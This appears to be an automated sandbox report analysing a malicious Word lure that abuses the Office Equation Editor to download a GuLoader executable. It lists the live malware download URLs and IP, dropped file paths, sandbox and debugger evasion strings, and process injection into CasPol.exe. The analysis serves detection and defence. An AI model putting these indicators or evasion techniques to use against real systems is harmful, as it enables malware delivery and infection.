Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Rorqu.pdb source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 0000000C.00000002.717652799.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.717553624.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.605917089.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F462D push FFFFFF85h; ret 12_2_002F4637
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F4628 push FFFFFF91h; ret 12_2_002F462B
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F4227 push FFFFFF9Eh; ret 12_2_002F41D7
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F1110 push cs; ret 12_2_002F1113
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F415A push FFFFFF9Eh; ret 12_2_002F41D7
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F3856 push edi; retf 12_2_002F3864
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F4F53 pushad ; ret 12_2_002F4F5B
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F30BC pushfd ; iretd 12_2_002F30D4
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F5BB6 push 6AF15976h; retf 12_2_002F5BCF
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F63B0 pushad ; ret 12_2_002F63B3
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F10D6 push FFFFFF9Ah; ret 12_2_002F110F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E3441 push ebp; retf 15_2_002E3444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E1482 push cs; iretd 15_2_002E1483
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E40F6 push esi; iretd 15_2_002E41BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E40D8 push esi; iretd 15_2_002E41BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E596A push edx; ret 15_2_002E596B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E417A push esi; iretd 15_2_002E41BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E3F4C push esi; iretd 15_2_002E41BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E0BD2 pushfd ; iretd 15_2_002E0BD6

Persistence and Installation Behavior:

barindex
Contains an external reference to another file
Source: webSettings.xml.rels Extracted files from sample: http://192.3.122.180/......w_w.....w.........-ww........-----www.----............ww--------....ww-/....ww.........-w-w------w-------ww-------......ww......---w.w--ww.w.wbk
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Rorqu.exe, 0000000C.00000002.722031609.00000000047A0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: Rorqu.exe, 0000000C.00000002.722031609.00000000047A0000.00000004.00000001.sdmp, CasPol.exe, 0000000F.00000002.717600183.00000000005C0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 0000000F.00000002.717600183.00000000005C0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2940 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 9_2_00406873 FindFirstFileW,FindClose, 9_2_00406873
Source: C:\Users\Public\vbc.exe Code function: 9_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_00405C49
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040290B FindFirstFileW, 9_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe System information queried: ModuleInformation Jump to behavior
Source: vbc.exe, 00000009.00000002.461296548.0000000000544000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: CasPol.exe, 0000000F.00000002.717600183.00000000005C0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=
Source: Rorqu.exe, 0000000C.00000002.722031609.00000000047A0000.00000004.00000001.sdmp, CasPol.exe, 0000000F.00000002.717600183.00000000005C0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Rorqu.exe, 0000000C.00000002.722031609.00000000047A0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F1822 mov eax, dword ptr fs:[00000030h] 15_2_002F1822
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002EB237 mov eax, dword ptr fs:[00000030h] 15_2_002EB237
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002EF459 mov eax, dword ptr fs:[00000030h] 15_2_002EF459
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F033F mov eax, dword ptr fs:[00000030h] 15_2_002F033F

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 2E0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\Rorqu.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to behavior
Source: Rorqu.exe, 0000000C.00000002.720546394.0000000001DE0000.00000002.00020000.sdmp, CasPol.exe, 0000000F.00000002.717696945.0000000000CC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: Rorqu.exe, 0000000C.00000002.720546394.0000000001DE0000.00000002.00020000.sdmp, CasPol.exe, 0000000F.00000002.717696945.0000000000CC0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: Rorqu.exe, 0000000C.00000002.720546394.0000000001DE0000.00000002.00020000.sdmp, CasPol.exe, 0000000F.00000002.717696945.0000000000CC0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 9_2_0040352D

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 531863 Sample: RFQ with Specification (Fit... Startdate: 01/12/2021 Architecture: WINDOWS Score: 100 36 onedrive.live.com 2->36 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 16 other signatures 2->50 9 EQNEDT32.EXE 12 2->9         started        13 WINWORD.EXE 302 50 2->13         started        signatures3 process4 dnsIp5 30 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 9->30 dropped 32 C:\Users\Public\vbc.exe, PE32 9->32 dropped 62 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->62 16 vbc.exe 9 9->16         started        38 192.3.122.180, 49165, 49166, 49167 AS-COLOCROSSINGUS United States 13->38 34 ~WRF{E3D87781-81EF...5-B55BE3B562FC}.tmp, Composite 13->34 dropped file6 signatures7 process8 file9 28 C:\Users\user\AppData\Local\Temp\Rorqu.exe, PE32 16->28 dropped 40 Multi AV Scanner detection for dropped file 16->40 42 Machine Learning detection for dropped file 16->42 20 Rorqu.exe 16->20         started        signatures10 process11 signatures12 52 Writes to foreign memory regions 20->52 54 Tries to detect Any.run 20->54 56 Hides threads from debuggers 20->56 23 CasPol.exe 20->23         started        26 CasPol.exe 20->26         started        process13 signatures14 58 Tries to detect Any.run 23->58 60 Hides threads from debuggers 23->60
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.3.122.180
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted Domains

Name IP Active
onedrive.live.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/....wW.........-w-w------W-------Ww-------......Ww......---w.w--wW.W.wbk true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://192.3.122.180/1100/vbc.exe true
  • Avira URL Cloud: malware
 unknown
https://onedrive.live.com/download?cid=5A false
    		high